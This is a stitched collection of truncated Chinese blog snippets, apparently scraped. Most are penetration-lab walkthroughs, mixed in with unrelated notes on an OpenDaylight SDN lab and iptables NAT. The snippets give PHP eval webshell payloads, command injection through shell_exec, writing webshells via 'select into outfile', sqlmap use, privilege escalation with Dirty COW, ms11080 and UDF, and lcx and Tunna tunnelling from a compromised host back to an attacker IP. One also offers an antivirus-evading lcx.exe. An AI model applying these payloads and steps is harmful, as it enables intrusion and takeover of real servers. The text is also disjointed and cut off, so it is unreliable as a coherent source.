更具实验文件知道存在源码泄露  下载源码进行源码审计 发现admin账号 查看user.php 发现mysql 账号 端口 对登录后源码进行审计 发现上传文件的两处漏洞 对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 '|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||' 菜刀连接 上传脏牛提权…
更具提示 先下载工具包 ip  172.16.12.226  打开bp 进行代理发现 整个页面 没有请求 没有其页面通过 御剑,dir ,hscan   进行目录爆破未发现有用信息    对当前页面进行代码审计发现png 二级图片路径 在对二级目录爆破 发现  upload.php 上传页面 尝试上传  把工具包内 上传    htaccess  内文件把 chopper.ccc 解析成php 文件 直接上传  返利他的dolowd.php 暴露上传后路径 直接菜刀连接 上传大马 md5解密 …
拿到靶场 直接进行扫描 爆破路径 发现 phpinfo, phpmyadmin  更具phpinfo 获取跟路径  也可以通过 输入错路径爆出绝对路径 phpmyamin  弱口令登录  root,root sql 直接写一句话木马 select  '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php' 菜刀连接   上传 ms11080.exe 提权 添加 90sec 用 mstsc 直接远程登录…
下载工具包  打开目标机 通过目录爆破发现 phpmyadmin    在登录位置尝试注入 返现 可以注入 直接上sqlmap    上 bp 代理抓包 sqlmap.py  -r  bp.txt  --dbs   利用sqlmap 跑出root 密码  root666888 登录 phpmyadmin t通过路径报错得到绝对路径 c:\\www\\1.php   root  权限可以直接写一句话拿shell   让后进行udf 提权 一句话写入 菜刀连接  上传udf 提权  提权 发现 ne…
鉴于在个人笔记本上虚拟机运行ODL实在太慢,把实验的场景搬到了实验室. 实验上:OpenDayLight Helium实验三 OpenDaylight二层转发机制实验 抓包实验 紧接着,在运行Mininet的虚拟机上,执行命令pingall,回到ODL的图形化web界面,查看拓扑图: 在OpenDaylight的Web页面查看Troubleshoot选项卡,查看当前两台交换机上已经下发的流表. 由于版本是氦版本的,和实验介绍的版本有出入,所以部分内容不一致. 在nodes里面查看流表: 流表1:…
http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm…
Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a…
作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 127.0.0.1:3333 今天刚刚第一次使用,特此共享! 另外提供我的免杀lcx.exe 提供给大家下载. 下载是:http://www.xi…
介绍 通过iptables做nat转发实现所有内网服务器上网. 操作 首先开启可以上网的服务器上的内核路由转发功能.这里我们更改/etc/sysctl.conf 配置文件. [root@web1 /]# sed -i '$a net.ipv4.ip_forward = 1' /etc/sysctl.conf [root@web1 /]# cat /etc/sysctl.conf # sysctl settings are defined through files in # /usr/lib/s…
把放置到已经控制的内网主机 执行 内网主机输入命令lcx.exe -slave 外网ip 外网端口 内网ip 内网端口lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389 外网主机输入命令lcx.exe -listen 2222 3388 打开 mstsc ip:3388…